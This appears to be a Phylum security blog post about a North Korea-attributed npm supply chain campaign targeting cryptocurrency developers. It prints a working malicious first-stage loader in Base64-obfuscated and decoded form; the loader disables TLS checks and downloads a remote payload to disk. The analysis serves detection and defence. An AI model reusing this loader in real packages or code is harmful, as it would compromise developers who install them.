June’s Sophisticated npm Attack Attributed to North Korea


In June 2023, Phylum was the first to unearth a series of suspicious npm publications belonging to what appeared to be a highly targeted attack. The identified packages, published in pairs, required installation in a specific sequence, subsequently retrieving a token that facilitated the download of a final malicious payload from a remote server. A recent security alert from GitHub publicly attributes this cyber-attack—which they were investigating independently—to threat actors with strong ties to North Korean objectives. In this article, we delve deeper into the context of this attack, while also unveiling novel information uncovered by Phylum since our initial publication.


The GitHub Security Alert

On July 18, 2023, GitHub posted a security alert on their blog, sharing further insights into this attack, which they had been collaboratively investigating with npm, their subsidiary. They described it as a "low-volume social engineering campaign that targets the personal accounts of employees of technology firms." They went on to say the following:

We assess with high confidence that this campaign is associated with a group operating in support of North Korean objectives, known as Jade Sleet by Microsoft Threat Intelligence and TraderTraitor by the U.S. Cybersecurity and Infrastructure Security Agency (CISA). Jade Sleet mostly targets users associated with cryptocurrency and other blockchain-related organizations, but also targets vendors used by those firms.

As GitHub explains, the threat actors would initially establish contact with their targets and subsequently extend an invitation to collaborate on a GitHub repository. This repository contained code that was dependent on malicious packages hosted on npm, which Phylum identified. According to the report, these malicious packages were published by the threat actors, "Only when they extended a fraudulent repository invitation, minimizing the exposure of the new malicious package to scrutiny." We hypothesize that the threat actors' servers were likely configured to only release the final payload during this brief window as well, thus explaining why we only ever retrieved "no history available" responses when investigating from our end.

North Korean Attribution

Apart from a few exceptions, the package names and domains discovered in this attack were predominantly centered around blockchain, web3, and cryptocurrency themes. Given the attribution of this attack to North Korea, both the naming choices and highly targeted nature of the attack now make sense.

North Korea is one of the most heavily sanctioned countries in the world, largely due to international concerns over the continued development of its nuclear weapons program and its history of human rights violations. This has left the country largely isolated from the world, both diplomatically and economically. In this context, North Korea's forays into hacking, particularly those associated with cryptocurrency, serve multiple purposes. In fact, the U.S. CISA (Cybersecurity & Infrastructure Security Agency) detailed some of these endeavors in a cybersecurity advisory published in April of 2022.

Diving deeper into North Korea's hacking operations, a few key motivations emerge. First, hacking provides a potential avenue to circumvent some of the sanctions imposed upon them. Second, given the anonymous nature of cryptocurrencies, these digital assets can be stolen, transferred, stored, and used without leaving a traditional paper trail, thereby creating difficulties for the regulators tasked with enforcing these sanctions. Finally, this kind of hacking has the potential to cause economic disruption and serve geopolitical objectives in an effort to assert North Korea's presence and capabilities in this domain despite their extreme isolation.

Given these considerations, the situation underscores the importance of supply chain security. Despite its novel initial attack vector, this incident was fundamentally a supply chain attack. Instead of exploiting common vectors such as typosquatting or dependency confusion, the threat actors employed social engineering tactics to deceive victims into collaborating on, and ultimately executing, seemingly innocuous software that happened to rely on malicious dependencies the threat actors had published. However innovative the initial vector, the compromise itself arrived through a dependency, which emphasizes the crucial importance of trust in your dependencies.

Phylum Discovers New Tactics From This Campaign

Since our initial publication on June 23, Phylum’s automated detection platform has alerted us to a few other packages from this campaign. In a clear and obvious effort to further evade automated detection, we witnessed the threat actors obfuscate the strings in a few packages by simply Base64-encoding them. Here's an example:

const os = require(atob("b3M="));
const path = require(atob("cGF0aA=="));
var fs = require(atob('ZnM='));
const w = atob('LmVsZWN0cm9u');
const f = atob('Y2FjaGU=');
const va = atob('ZGFyd2lu');
async function start(){
	process.env[atob('Tk9ERV9UTFNfUkVKRUNUX1VOQVVUSE9SSVpFRA==')] = 0
	var dir = path.join(os.homedir(), w);
	if (!fs.existsSync(dir)){
		fs.mkdirSync(dir);
	}
	var axios = require(atob('YXhpb3M='));
	if (os.platform() == va){
		var exec = require(atob('Y2hpbGRfcHJvY2Vzcw==')).exec;
		exec(atob('bnBtIGkgLS1wcmVmaXg9fi8uZWxlY3Ryb24gZmZpLW5hcGk='), (error, stdout, stderr) => {
			console.log(stderr);
		});
	}
	var res = await axios.get(atob('aHR0cHM6Ly9ucG1hdWRpdC5jb20vYXBpL3Y0L2luaXQ='));
	fs.writeFileSync(path.join(dir, f), res.data);
}
start()

Here's the same code with the strings decoded:

const os = require('os');
const path = require('path');
var fs = require('fs');
const w = '.electron';
const f = 'cache';
const va = 'darwin';
async function start(){
	process.env['NODE_TLS_REJECT_UNAUTHORIZED'] = 0
	var dir = path.join(os.homedir(), w);
	if (!fs.existsSync(dir)){
		fs.mkdirSync(dir);
	}
	var axios = require('axios');
	if (os.platform() == va){
		var exec = require('child_process').exec;
		exec('npm i --prefix=~/.electron ffi-napi', (error, stdout, stderr) => {
			console.log(stderr);
		});
	}
	var res = await axios.get('https://npmaudit.com/api/v4/init');
	fs.writeFileSync(path.join(dir, f), res.data);
}
start()

Upon inspection, it becomes apparent that the contents are virtually identical to those in the first required stage of any package pair we initially discovered. Below is a list of packages employing the Base64-encoded tactic that we have identified so far.

  • js-cookie-parser
  • xml-fast-decoder
  • btc-api-node

Additional Packages Since Initial Publication

Aside from the obfuscated packages mentioned above, we have also been tracking additional packages since our initial blog publication. They are as follows:

  • coingecko-prices
  • binance-price
  • binance-prices

Conclusion

The presence of nation-state actors within open-source ecosystems should not come as a major surprise for several reasons. First, the vast attack surface presented by these ecosystems is hard to ignore. It's virtually impossible for a developer in today’s world not to rely on any open-source packages. This reality is typically exploited by threat actors aiming to maximize their blast radius for widespread distribution of malware, such as stealers or ransomware. Conversely, when conducting a highly targeted attack on a specific developer or organization, the software supply chain offers an extensive surface area for intrusion.

Second, with tens of thousands of packages published daily across various ecosystems, one might assume that blending in with the noise would be relatively easy. While this may have been more feasible in the past, the rise of tools like Phylum's automated risk detection platform is making this increasingly challenging.

Regardless, the software supply chain, with its growing size and complexity, remains a prime target for cyber-attacks. As such, it continues to attract the attention of threat actors of all types, emphasizing the persistent and evolving nature of supply chain cybersecurity threats.

Phylum Research Team


Hackers, Data Scientists, and Engineers responsible for the identification and takedown of software supply chain attackers.